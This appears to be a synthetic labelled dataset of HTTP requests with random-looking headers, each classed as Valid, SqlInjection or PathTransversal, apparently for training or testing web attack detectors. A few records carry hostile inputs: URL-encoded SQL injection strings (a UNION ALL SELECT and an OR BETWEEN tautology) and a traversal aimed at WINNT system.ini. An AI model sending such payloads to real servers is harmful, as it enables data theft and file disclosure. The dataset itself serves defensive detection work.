Accept-Language: y-i, c0pare-rr2ehenY;q=0.5, aoed1t-eoohresX, heo0ou-hi;q=0.2
Cache-Control: only-if-cached
Client-ip: 126.199.48.35
Cookie: rE2la88auie6wha=enh=i;tt3ltzarm=script;mrucDaiseoh5m=861;_Jdb=1henataam/n
Cookie2: $Version="189"
Date: Mon, 05 Sep 05 22:51:49 GMT
ETag: W/"rT_2qatuZEWsIh0Ss"
Expect: Lfhs7
From: 4Pioe@levcc.org
If-Modified-Since: Mon, 08 Jun 09 09:47:35 CET
If-Unmodified-Since: Mon, 17 Aug 09 05:15:27 GMT
If-Match: "Jg8mBMgqkzZEwJe"
If-None-Match: "MKExlY5zBu8t6qXnKtsK"
If-Range: Wed, 23 Sep 09 03:17:20 UTC
Max-Forwards: 507
MIME-Version: 5.8
Pragma: hondde=a1w0w
Proxy-Authorization: NTLM YWJvdG5vbHJzdHNlbXJvZmlldTJkT2VnYWRSc1B5bzdlaWJodGNy
Authorization: Basic MnRhYXRpOmg2bGFheQ==
Range: 94913-68559,806419-4130
Referer: http://nislh.it/stevsiU.php4
TE: gzip;q=0.0,deflate;q=0.6
Trailer: Max-Forwards
User-Agent: Mozilla/0.4 (X11; U; Solaris 0.6; mi-eu; rv:3.0.8) Gecko/51304540
UA-CPU: PowerPC
UA-Disp: 9340,8339,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 1017x8120
Via: FTP/3.0 www.exnbfE9R.gif
Transfer-Encoding: bhcai
Upgrade: g8mn/1.2, BihP/1.3, isA/2.4, gnpI/4.1
Warning: 261 www.tddrisan.shtml:4608 "amni" 
X-Forwarded-For: 127.43.236.207
X-Serial-Number: 22326900137086
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24725
Start - Id: 8382
class: Valid
GET /ehenoj.gif? HTTP/1.0
Host: www.jmrOT.st
Connection: close
Accept: application/*;q=0.4, text/html;q=0.3, image/*;q=0.9
Accept-Charset: *
Accept-Encoding: deflate, deflate
Accept-Language: RArr-kiltpmh9;q=0.1, e-rye, p-e03eeu;q=0.1
Cache-Control: terEatl=v
Client-ip: 242.175.249.246
Cookie: gKservices3Cy=1418;JhwuL9=nsot-
Cookie2: $Version="05"
Date: Thu, 05 Feb 09 07:47:08 UTC
ETag: W/"v7S-SiZtgEZ6Iy70PYG"
Expect: untOhhii=htmg
From: erpa3@smdtCgnon.be
If-Modified-Since: Tue, 10 Jan 06 15:43:30 CET
If-Unmodified-Since: Sat, 28 Feb 09 04:48:43 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 09
MIME-Version: 9.5
Pragma: LvoYhn=R
Proxy-Authorization: Basic ZGtjczplWWNuZHRmRA==
Authorization: Digest nonce
Range: 994131-66069
Referer: http://www.dhlot.uk/yohIfaax/b2oRio.gif
TE: chunked
Trailer: Warning
User-Agent: Mozilla/2.5 (Machintosh; U; PPC Mac OS X 7.3; sp-nu; rv:7.7.3) Gecko/43943171
UA-CPU: PowerPC
UA-Disp: 283,560,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 4723x390
Via: FTP/5.6 www.5nrr.gif
Transfer-Encoding: deflate
Upgrade: o1iL/4.6
Warning: 051 142.192.100.17 "aDe4she" 
X-Forwarded-For: 240.233.176.16
X-Serial-Number: 4380608
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8382
Start - Id: 18390
class: Valid
GET /at/lmDK04rFlUkhDHaVVu/80n4WodHY/nF@bXwy/Sggls6so7Mexecz/eApOPiX0HAV1/irhdu/v-AB4wqyNqirFQsPPUoc.msf?egWadae=poTmrm%3FmU%3B%7Ca+in&aagaeeptvga=nmtheonsdor&inn-Na3dB=hYrA7ohsu1ostnei&qian8sxeo=esnh&snrstftrraeFep=ouwarcuNtK&1msElEt=sppfhCefncueitt8Tita&tDhnrinsltmS=0&aontod=3787335&ezst=Oeejnelikee%5Cea&A1rnN9jfcB=u8ci&iap4e2detIwnf=neldctn&sg=16235952&te9gshtghRis=ea3450o8ief8sm HTTP/1.1
Host: 43.234.33.226:80
Connection: keep-alive
Accept: video/quicktime, image/*
Accept-Charset: *
Accept-Encoding: *;q=0.7
Accept-Language: *;q=0.3
Cache-Control: only-if-cached
Client-ip: 50.134.94.108
Cookie: 8ttetk=nhomec|eDfM;etbex0hrqnenh=scripti+ttD-mi=c[sie(l;da;eeeone=9;it=sKSg
Cookie2: $Version="8"
Date: Wed, 27 Dec 06 11:17:15 UTC
ETag: W/"DFGyG11.7FB0Cd_awC"
Expect: 100-continue
From: riig0g@lptIii.ch
If-Modified-Since: Sun, 30 Jan 05 03:50:31 CET
If-Unmodified-Since: Tue, 21 Sep 04 17:47:56 GMT
If-Match: "LjYPyQnW5CSoEhL"
If-None-Match: *
If-Range: "MotH1zEVU4lCBdYBHv"
Max-Forwards: 689
MIME-Version: 9.8
Pragma: no-cache
Proxy-Authorization: Basic YXNob2lvZTplSG1h
Authorization: ahes urkauset=elhls4e
Range: -1,77209-
Referer: /yAayeeH/Ehga1aTe/anaitd/6sfhbtt.tar.gz
TE: chunked,trailers,deflate;q=0.5
Trailer: Cache-Control
User-Agent: Mozilla/5.8 (Machintosh; U; Mac OS X 0.1; oo-si; rv:4.9.4) Gecko/45534226
UA-CPU: x86
UA-Disp: 0207,859,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 705x273
Via: vprxt/9.0 223.8.220.144, 6.3 www.cAaao4te.htm, 1.6 54.21.134.26
Transfer-Encoding: compress
Upgrade: pto1de/0.8, qne/9.3, atwl/8.8
Warning: 233 131.132.144.191 "OnEdmsatmalecc2jI" "Sat, 10 Jun 06 22:22:26 UTC"
X-Forwarded-For: 185.28.190.254
X-Serial-Number: 9325860267416944126
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18390
Start - Id: 25602
class: Valid
GET /eFCMWN/stytkQlVwO.YUuiP/imsniOS/syisddc/suFFYtf7uG/RK-Q0qlocation/gilb1oduo/cY5dglra/kighV/hwjr@bAxnAI6mI.tiff?uneasrTesn86T=7&emjberhD=lneaaccess_log%2F&opssitrltEn=6&rhOos4maieet4Yo=r%3Aetand+etc&location6GGM=eanl+%5D%40io&RiQMTUPR3upu=oonaehzekfeoiys&afemelHleQoton=es&tgHKnggLhn=865863&hGpSk=0823&8rweur0mse=oucW&am=22545817&aohrqrshwelrewe=7634985&ittcrb=t8axk%7Essesast&anlatcii7pq=6607&ntesakensmil=r HTTP/1.1
Host: 162.230.157.101
Connection: Rtihn4w
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: *
Accept-Language: *;q=0.3
Cache-Control: no-transform
Client-ip: 70.74.10.34
Cookie: XK.XL7Oi=FLe5
Cookie2: $Version="532"
Date: Sun, 11 May 08 11:30:57 UTC
ETag: W/"-vFLLiCYGnZ.bQ_2Uxwx"
Expect: raIu=iti3lrr
From: ofler@wmho0ac.it
If-Modified-Since: Fri, 03 Aug 07 15:39:31 GMT
If-Unmodified-Since: Wed, 20 Aug 08 06:40:12 GMT
If-Match: *
If-None-Match: *
If-Range: "m1gN@tY99yw.uwtM"
Max-Forwards: 2
MIME-Version: 6.8
Pragma: sctwtehe='ssoanhte'
Proxy-Authorization: y7Leo nhelo=fiaeie
Authorization: Basic dGNpbjp0ZXN0YQ==
Range: 286-,8185-
Referer: http://www.sditpm.cz/oitIu.png
TE: gzip;q=0.3,deflate;q=0.1
Trailer: Warning
User-Agent: 4d6utntke/5.9.4.1
UA-CPU: PowerPC
UA-Disp: 8439,526,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 0434x8135
Via: 2.1 89.215.244.152
Transfer-Encoding: identity
Upgrade: 1ri/9.8, wbhp/8.4
Warning: 650 136.91.203.255 "ymolni9b19rts" 
X-Forwarded-For: 255.93.182.143
X-Serial-Number: 10779920705093
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25602
Start - Id: 41796
class: SqlInjection
GET /winntTS/1_miVu/l@n9nt__Jo/aEj/NQL4B.swf?t9uhf=er+E&connect-group by5q3amfi=ekb9giiur&e45i8k=sCshp5&zrnztooltou8w=ade0Itnullsitp1dinett&1Leotnna=lRTnd7tngoTsd&oetet3lboukal=edtu+&R0SRvhttpsBk=80270824&sloeotad=7tRet&osNdtoacSceh=sYvYdHnaG%40S&apUdo=rvh3&tnrdysetesCel=%27+%29+UNION++ALL+SELECT+++5%2C5808%2C6%2C144%2C2463++FROM++aelffT+++WHERE++%28++%27%27+++%3D+++%27&ErthdtxOebs=et&c4Pwsystem=C8esrttfpjelh HTTP/1.0
Host: 224.65.40.231
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: identity;q=0.4, identity
Accept-Language: aro-iiE5ott;q=0.9, uhTt-s;q=0.4
Cache-Control: max-stale
Client-ip: 218.44.126.244
Cookie: lkahhhh=rRnOe;orn5neinaseaAL=71100229;4Gmeta7h6pSAqou=3
Cookie2: $Version="408"
Date: Thu, 03 Dec 09 04:41:10 CET
ETag: W/"ZXEXElr@0LpV3YJGdbm"
Expect: onotkol
From: hwhheI@8isu.ch
If-Modified-Since: Fri, 10 Aug 07 07:03:30 CET
If-Unmodified-Since: Thu, 17 Jan 08 10:41:55 CET
If-Match: "U3HSCRJZvBuFJOs7E93"
If-None-Match: *
If-Range: Wed, 28 Apr 04 22:37:55 GMT
Max-Forwards: 167
MIME-Version: 8.5
Pragma: no-cache
Proxy-Authorization: Basic c2ppZGFueHk6ckl3MWll
Authorization: Basic aW9jZTllOm5pbnlm
Range: 82059-
Referer: http://www.1rnMe.st/xndp.shtml
TE: gzip,trailers,deflate;q=0.4
Trailer: User-Agent
User-Agent: rnoya8
UA-CPU: x86
UA-Disp: 885,1136,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 832x0332
Via: HTTP/3.5 www.teeer.shtml, FTP/6.2 www.ucrou.js, FTP/1.1 24.6.237.44
Transfer-Encoding: gzip
Upgrade: eet/8.2, womym/1.9, Orius/4.0, orvtl/1.7, sae7/5.2
Warning: 864 www.eeeoa.css "hlrre9anouesreagre4w" 
X-Forwarded-For: 234.161.201.75
X-Serial-Number: 913755
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 41796
Start - Id: 30659
class: Valid
GET /YTttmex6oSwaSnsGah/@KIdU55MPw/rca/4Y3HpMG.jpg?esPhau4x3qly=73419704&caISJP=miTssvil1tb&ittyei=elioe2%26ehr3rAd HTTP/1.0
Host: 155.185.205.112
Connection: close
Accept: */*;q=0.0
Accept-Charset: ks_c_5601-1987
Accept-Encoding: *;q=0.1
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 67.66.20.239
Cookie: fi=d9blu;ig=beoeR;ps0Ce=0shutdown5G|o96sCorvbscript
Cookie2: $Version="79"
Date: Sun, 23 Dec 07 21:12:40 GMT
ETag: "hU2jxW9l_8kAduKYw0te"
Expect: 100-continue
From: ceAnse@0hhlitFdht.fr
If-Modified-Since: Thu, 15 Oct 09 20:22:35 UTC
If-Unmodified-Since: Mon, 14 Sep 09 22:05:40 GMT
If-Match: *
If-None-Match: "RJ.SWP0OHjuN9.L6w"
If-Range: "nIubLP9KV-X81tkZOqZm"
Max-Forwards: 444
MIME-Version: 8.0
Pragma: yu5=nnt
Proxy-Authorization: otnae s4trl2e=Mefno
Authorization: clOg sapgrflw=cgegnb
Range: 0-,163-,68-6
Referer: /3eNuUs0.bin
TE: gzip,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/7.7 (Windows; U; Win 9x 6.7; nr-es; rv:1.3.9) Gecko/13452052
UA-CPU: MIPS
UA-Disp: 7934,865,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 7462x1873
Via: FTP/7.9 www.Pslse.jpg, deoimt/2.7 193.41.150.125, 4.1 www.jrkh.jpg
Transfer-Encoding: compress
Upgrade: eMR/0.4, Xw1Rp/0.0, t9se4/2.1, chf/5.5, oF4di/5.3
Warning: 047 www.Vcie.gif:267 "ksqsddinwgeeW" 
X-Forwarded-For: 21.250.209.193
X-Serial-Number: 472936518137
----: ------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 30659
Start - Id: 21051
class: Valid
GET /lriR2en/nojrudiinliie53hbg/phohl5Eeet/litoehrcesse.jsp?nai9lcEosDjd=8830778831&shr3itzo=6052327&trskoe5se=ep0U2vuP8&d0etdddcoia=43&CrrsatEo3=ualohrtmp&olnlDosdnW4tb=olfc2buXNJts&ym=a5L6PDUWGN&re7Seohedg=lie&iyPR=iBPs.ANM-pfz&gaao=mS6Lx0qvoGW&eeWpMLan6=210&ZyUQEZBEQrps=hLzildOeto&yehxttmttmelcr=47242521 HTTP/1.1
Host: www.ettRghn61.be
Connection: keep-alive
Accept: video/quicktime;q=0.8, text/*
Accept-Charset: shift_jis, iso-8859-8-i;q=0.8, x-mac-ce, us-ascii;q=0.2, iso-2022-kr
Accept-Encoding: 
Accept-Language: te0l-Ec9oeku, oe-me3, nit1amhz-bnf, 3-rsnZ4;q=0.3, eS-e4hitzr;q=0.3
Cache-Control: max-age=3889
Client-ip: 226.117.147.113
Cookie: ca=renm wL;TsoiResO=65;aimiRtb=Xee1a
Cookie2: $Version="2"
Date: Thu, 27 Aug 09 14:31:46 CET
ETag: "k@AvUbctkJuLphJJw_fG"
Expect: 100-continue
From: uo8i@oteEttyH7e.gov
If-Modified-Since: Mon, 31 Jan 05 11:37:13 GMT
If-Unmodified-Since: Sat, 18 Apr 09 02:21:06 GMT
If-Match: "JHMAJmx_8EQ6lY9yNq"
If-None-Match: "rbNCvsv90zI1H8vVOyu"
If-Range: *
Max-Forwards: 8731
MIME-Version: 4.0
Pragma: no-cache
Proxy-Authorization: Basic b2h0cGVlbDpsbHFzZGlt
Authorization: NTLM eWVlUmZhYXFsdXRvMjhPY2VnVGUzZ2FoaUFlc2VvRWVp
Range: -823,-809,7-
Referer: /7Srzdeus/uenxt.msf
TE: deflate
Trailer: If-Modified-Since
User-Agent: Mozilla/7.2 (Machintosh; U; Mac OS X 4.1; Eq-so; rv:6.4.6) Gecko/12103042
UA-CPU: 68000
UA-Disp: 2624,2413,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 523x776
Via: 9.9 www.rbdIeIr.htm
Transfer-Encoding: tAnar; lsiLmdp=rukF
Upgrade: fi8t/2.3, 5rpaw/5.5, err/7.7, p5k5e/0.4, ydtwy/2.6
Warning: 708 255.125.121.38 "eth4asnh" "Sun, 05 Aug 07 12:56:58 UTC"
X-Forwarded-For: 204.19.242.253
X-Serial-Number: 650978480578430420
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21051
Start - Id: 18226
class: Valid
GET /e38UDsFmmUcOszEQPM/aWwTZ/orllrafldo/993Y0Oe2BO863tN/m.._.CPSOJ49c3iO6K/eY2g6p4vsWLcxFenoT/fbrtmmmmanm.php3? HTTP/1.0
Host: 205.123.87.40
Connection: ea2l9e
Accept: */*
Accept-Charset: iso-8859-2, x-mac-icelandic, x-mac-greek;q=0.5
Accept-Encoding: compress;q=0.5, identity;q=0.8
Accept-Language: thzet-Qeq, cauthpni-Aiw;q=0.7, riwtrpn-jmGieel;q=0.0
Cache-Control: only-if-cached
Client-ip: 54.14.85.26
Cookie: lEfi=eemvea;reud=18507951;Aghxsks=rsEa;43e=nltai4l;tifmzemi7vdf=te2LntadivTceoEmn
Cookie2: $Version="6"
Date: Mon, 11 Dec 06 24:18:35 UTC
ETag: W/"xVLM-ZC4hTWiDr0C_fb@"
Expect: hianwiaU=gdesosyt
From: ol6hoaex@hcAilF.org
If-Modified-Since: Sat, 08 Apr 06 14:35:01 GMT
If-Unmodified-Since: Mon, 07 Jan 08 02:28:31 GMT
If-Match: "9BK2FDTXA6uJl5hVZ"
If-None-Match: *
If-Range: *
Max-Forwards: 567
MIME-Version: 0.2
Pragma: yr='Enp'
Proxy-Authorization: Digest username="3eohCe"
Authorization: Basic d2VhdWhmc206bzZjb0hhag==
Range: 7902-
Referer: /esnt8r/0nua/rmEneshk/rotin/NPt5e.tar
TE: deflate,trailers
Trailer: If-Modified-Since
User-Agent: tvjtye6 (aXYSKE; nRsUajsuT)
UA-CPU: StrongARM
UA-Disp: 202,576,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 810x317
Via: 4.8 www.est7.shtml:9
Transfer-Encoding: deflate
Upgrade: hicew/7.4, 1ok/5.7, 4ba/6.1, Inm/8.9, hutr/5.7
Warning: 162 215.73.103.201 "k5qlycso5ziN" 
X-Forwarded-For: 164.38.194.242
X-Serial-Number: 104634780
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18226
Start - Id: 42086
class: SqlInjection
GET /o0dVSJ3_3.-/otK0lmiMO2AU/7AOHs9i0/1osnie/eCiKmzH2jpKu92Zr/fpzB.msf?iTe=Zeeti&iuh=hILl&toaihneenL9ll=mmDo.wfFTb4.&tda=dbmH&i.DQ65zG=wasgors&x8KR@mps1Z0rchild=jm+e8pU8tfBSdrbody&eiodefomeOnskve=4tnaj%24sspd&AgDNi=te4o&tLt3nlooRet88de=%27+++++OR++++%27soswiltje6%27+BETWEEN+++%27R%27++++AND++%27T&GHYpEkewJUJnode=ntendeleteio+Ewindow.opensltt HTTP/1.0
Host: www.3irRnar.gov
Connection: keep-alive
Accept: text/*;q=0.1, video/quicktime;q=0.1
Accept-Charset: euc-kr;q=0.5, koi8-r;q=0.5
Accept-Encoding: *
Accept-Language: cvftp-p4ii0o, fi-apennRiu;q=0.8, npo6ydi-2tnletIk;q=0.6, i91t-gNnitaa;q=0.2
Cache-Control: no-cache
Client-ip: 183.141.254.90
Cookie: sjt=trvarhrBU'i@ameuf8
Cookie2: $Version="068"
Date: Wed, 17 Oct 07 13:11:54 UTC
ETag: "m0e.RyTZWMInQHe"
Expect: 100-continue
From: amm24r@w2uiwd.st
If-Modified-Since: Fri, 31 Dec 04 14:30:27 CET
If-Unmodified-Since: Thu, 27 Nov 08 20:07:43 GMT
If-Match: *
If-None-Match: "CBdoAIx1Iol5FHJG"
If-Range: "FMwktoF_ETH@22R63"
Max-Forwards: 6378
MIME-Version: 0.9
Pragma: eso=n
Proxy-Authorization: NTLM VGFlZHBlN3lzdDM4RWV0aWJsaGlhYWJoc2ZvdFd1aWVTZWxi
Authorization: Digest algorithm=roOs
Range: -951
Referer: http://www.drA9h8.it/lfdjd7t7/geear3tt/sui0hrt7/nim7/6Horlas.gif
TE: trailers
Trailer: If-Match
User-Agent: svsB/5.2.2.6.3
UA-CPU: x86
UA-Disp: 7502,392,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 861x9768
Via: 7.4 www.trrsilt.gif, 9.3 www.cIefl.jpeg:40
Transfer-Encoding: compress
Upgrade: a3r/9.3, rhiho/2.1, tse/5.1
Warning: 145 www.cr5ce.html "1asaNdgii" "Tue, 19 Jan 10 12:01:34 CET"
X-Forwarded-For: 39.4.112.68
X-Serial-Number: 912151407
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42086
Start - Id: 45715
class: PathTransversal
GET /tIZN1homePTh/ts4anae/hQV/ruec9uewo5dtxde3Btya.bin?sd=siiItMbeiframe3&Aasqnper5ti=..........................WINNTsystem.ini HTTP/1.1
Host: 162.159.23.209
Connection: close
Accept: image/png;q=0.7, video/*, application/x-tar;q=0.7
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: *
Cache-Control: max-age=49806
Client-ip: 244.124.85.82
Cookie: daddT=t\huoor;intrnsiorr5=mtirhtaccesob)ne;N6ehaniieaetl=ieew;h6hctrdEethcuyn=ormeoiodz6ui;Z6ui3rLO5Yt=%;h3ea=nEo tEs7Ril&lccand6t
Cookie2: $Version="0"
Date: Sat, 31 Dec 05 20:12:17 CET
ETag: W/"skf@5ex@3kGAQzU0"
Expect: esf5d5=o26ss;rpg2hNxt=sn9g
From: reani1tb@daeireeubl.de
If-Modified-Since: Tue, 24 Mar 09 20:04:48 CET
If-Unmodified-Since: Fri, 05 Dec 08 05:33:23 UTC
If-Match: "_O2__yriN3AkuCtSwCg"
If-None-Match: "wVohVIL27Q2lpzvZGMki"
If-Range: *
Max-Forwards: 2840
MIME-Version: 2.1
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Digest nonce
Range: -958,-975,-318
Referer: /hnho.dll
TE: trailers,chunked;q=0.3,trailers
Trailer: Cache-Control
User-Agent: Mozilla/1.7 (Windows; U; Windows NT 1.6; ay-ca; rv:0.3.9) Gecko/02804799
UA-CPU: x86
UA-Disp: 8763,047,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 967x7308
Via: FTP/1.3 www.sfprl.css, 2.9 19.72.15.220, 7.2 www.ioih.gif
Transfer-Encoding: 0tlo
Upgrade: sz3/7.1, 6Dnd/4.3
Warning: 288 223.210.181.104 "nzlia9itn3swklmex" "Fri, 29 Apr 05 08:27:02 GMT"
X-Forwarded-For: 139.27.168.135
X-Serial-Number: 1618317
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 45715
Start - Id: 4298
class: Valid
POST /e3T8XkF4f_e7t_/cUPbwIZGKASpKz8jsp/hvhy/gn/iTY70y2/dohTAglma/eS9mSdZZIuE0apx..msf? HTTP/1.1
Content-Length: 204
Content-Language: YpFo6nu,toiwe5
Content-Encoding: compress
Content-Location: /jrsgN7kH.tiff
Content-MD5: c2oxbDJyZWhhZmF1ZXNmcA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 05 Mar 10 01:40:58 UTC
Last-Modified: Thu, 16 Mar 06 07:24:17 UTC
Host: 172.192.225.90
Connection: Eiiiniot
Accept: application/zip;q=0.1, text/plain;q=0.5
Accept-Charset: cp-932;q=0.1, iso-8859-8;q=0.7, x-mac-japanese;q=0.6
Accept-Encoding: *
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 15.135.42.57
Cookie: saeAawget0aK4O=nhoeTxic:nfromw
Cookie2: $Version="33"
Date: Sat, 27 Jun 09 01:33:45 UTC
ETag: W/"wQldDw@IFnBLoOH1Dwk"
Expect: 0taan=mfei;nrartr
From: hniryitt@cesrtata.de
If-Modified-Since: Thu, 20 Jan 05 19:56:12 CET
If-Unmodified-Since: Sat, 29 Jul 06 16:26:41 GMT
If-Match: *
If-None-Match: "Eas6qQ7Pv4gi@XwLUg"
If-Range: *
Max-Forwards: 842
MIME-Version: 2.3
Pragma: no-cache
Proxy-Authorization: Digest username="tNt9auq"
Authorization: Basic aWNqaTozZWwyaW9udg==
Range: 695-
Referer: http://tueer.org/ilde/dohahdm/poadh.swf
TE: chunked
Trailer: From
User-Agent: Mozilla/4.6 (X11; U; Open BSD i386 9.1; ac-p7; rv:3.5.3) Gecko/11955582
UA-CPU: Sparc
UA-Disp: 9274,388,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 470x229
Via: 9.0 www.arrrsh4.js
Transfer-Encoding: deflate
Upgrade: Unh/4.4
Warning: 355 124.140.178.141 "etawMcbaeeisSIpeea" "Thu, 23 Nov 06 12:50:35 CET"
X-Forwarded-For: 132.110.249.171
X-Serial-Number: 41906
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

sdeEBnxiEnhehgN=0n&nheomshAio=daRtgcpsirirN&g93nxEoge=zkLuPGYUu.d&el0er4hEshhA=115&ycuChic2oegt5el=027514&meelqtps22ahmbo=31362&hiwa3hpmaEE=iohzoaes&dionbal=Zhs s eiimgT'6hL&dtueei=ti&rtSyneruo=gMPcxKqh

End - Id: 4298
Start - Id: 21238
class: Valid
GET /6mPJduechon.mdb?rK=8%24+m&rmLhD=tzU.&tamui33Eq=oatm5A%3Ce+i%7C&O9zgOcmetaV_C=formtfrT&lr=%3E&hiIniii=0nII2D HTTP/1.0
Host: www.aiutl.fr:644
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.7
Accept-Language: *
Cache-Control: max-stale=0
Client-ip: 170.94.225.207
Cookie: CAbe=4T5nleensggz
Cookie2: $Version="6"
Date: Fri, 24 Aug 07 08:27:21 GMT
ETag: "Pn7wpUNRDgZuyN1"
Expect: 100-continue
From: xlttati@m2ttsnraoo.uk
If-Modified-Since: Thu, 11 Oct 07 10:10:38 GMT
If-Unmodified-Since: Wed, 09 Feb 05 17:38:40 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 17 Jul 04 14:40:24 GMT
Max-Forwards: 437
MIME-Version: 6.7
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Digest nonce
Range: 514-56,34-,2775-22974
Referer: /rl5mnnNo.wmn
TE: gzip;q=0.0,chunked;q=0.1,chunked
Trailer: If-None-Match
User-Agent: Mozilla/6.1 (Windows; U; Win98 8.2; bi-5o; rv:3.7.7) Gecko/75088027
UA-CPU: PowerPC
UA-Disp: 664,7142,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 412x6900
Via: 3.4 www.2bopfX.gif, FTP/4.1 126.109.3.106
Transfer-Encoding: gzip
Upgrade: vlnrne/8.6, lQaa/8.0, ystnvI/3.6
Warning: 416 www.oreomo.html "hmueAnjncy6nosrA3ar" 
X-Forwarded-For: 235.168.20.114
X-Serial-Number: 323295
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21238
Start - Id: 12830
class: Valid
GET /hePWc73Gn5fMjayXP/iacm/nZ-qWOHUKg/varwohj/lfz3l5hpseth/rGh4PxAbZ.msf? HTTP/1.0
Host: www.snXjndr.gov:80
Connection: tus9eovs
Accept: text/plain;q=0.0
Accept-Charset: *;q=0.2
Accept-Encoding: *;q=0.3
Accept-Language: *;q=0.0
Cache-Control: only-if-cached
Client-ip: 98.8.67.27
Cookie: n7m1erreohbugk=80LhiDp@b7hk;sdcm=02094
Cookie2: $Version="4"
Date: Thu, 22 Sep 05 09:45:31 GMT
ETag: "bgPzNMyNJ@_19U_S"
Expect: 7tunte
From: tibfhrt@6ra7.com
If-Modified-Since: Tue, 07 Nov 06 18:33:29 UTC
If-Unmodified-Since: Sun, 05 Dec 04 06:21:53 CET
If-Match: "W0-zjlWOTjgAXx1K"
If-None-Match: "9ahM_4oEtxEZfBKO.3"
If-Range: "w6jmkt7X-aY0fDG"
Max-Forwards: 3
MIME-Version: 1.4
Pragma: 4gtanuHn='oqeoS'
Proxy-Authorization: Basic SWhJZlpldDp5bWhlOWg=
Authorization: Digest response="a7fBd66B6D6FaE60a6ca27A8a04481fa"
Range: -27,-00780
Referer: http://heerpa.org/uOds7/eebea8tt/lipef/aais/oeauSu.mpeg
TE: chunked,trailers
Trailer: Referer
User-Agent: Mozilla/6.6 (X11; U; Linux i586 0.9; eO-ik; rv:0.8.2) Gecko/33088677
UA-CPU: 68000
UA-Disp: 3127,7217,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 8634x945
Via: osea/7.7 www.hOotkdot.tiff, HTTP/4.0 166.42.156.95:225, FTP/0.1 www.7dimmi3.html
Transfer-Encoding: oryb
Upgrade: nhevnn/5.6, qd3g/2.0
Warning: 443 11.128.35.247 "eilrust" 
X-Forwarded-For: 126.193.58.111
X-Serial-Number: 418129367421355732
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12830
Start - Id: 13030
class: Valid
GET /c5ntf/6X_6nHI@Q3EX-allR/bahmear62ei/B6ghc/rwo5afcnpc/I95ny%u_u5AS/lFn7autoexecGVtw.GdR8c/8yXFfS-Be19TRAin.shtml?nrCwas=g&T5yWhi_JLSVk=+&etehh=rlc%29is&ecms1eh=285506 HTTP/1.0
Host: www.d4bo.com:78
Connection: xyepsAt
Accept: application/*;q=0.2, image/*;q=0.3
Accept-Charset: windows-1254;q=0.4, windows-1258;q=0.5, cp-950;q=0.3, ks_c_5601-1987;q=0.6, cp-936;q=0.4
Accept-Encoding: gzip
Accept-Language: *;q=0.1
Cache-Control: max-age=433
Client-ip: 82.22.221.79
Cookie: eUw05gk=558732;etfEl=odEeq;ecRAehtL1a=037
Cookie2: $Version="7"
Date: Tue, 06 Jan 09 24:30:04 UTC
ETag: W/"uGhAmvAqy.JoEy2"
Expect: 100-continue
From: 5dwe1@ebi1lgoaan.gov
If-Modified-Since: Sun, 22 Aug 04 23:44:43 UTC
If-Unmodified-Since: Mon, 03 Aug 09 11:52:35 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 09 Jun 09 21:43:24 UTC
Max-Forwards: 9
MIME-Version: 7.6
Pragma: p71ego0n=eio9
Proxy-Authorization: 3lgxt zSrsa=0e3eal
Authorization: Basic bmh6bTpoZWpmTmFt
Range: 809093-4768
Referer: /csesn/oiahd/Llbwdtad/edfea0n.swf
TE: trailers
Trailer: Proxy-Authorization
User-Agent: h6cfxI (dXTFay; hwe@bWU)
UA-CPU: x86
UA-Disp: 5331,978,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 011x9947
Via: 0.2 20.190.78.52, 4.3 www.izca.js:17
Transfer-Encoding: compress
Upgrade: ag4/9.4
Warning: 255 101.108.66.228 "edon2hsulniorc" "Sun, 25 Sep 05 11:05:11 CET"
X-Forwarded-For: 246.234.27.207
X-Serial-Number: 72290
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13030
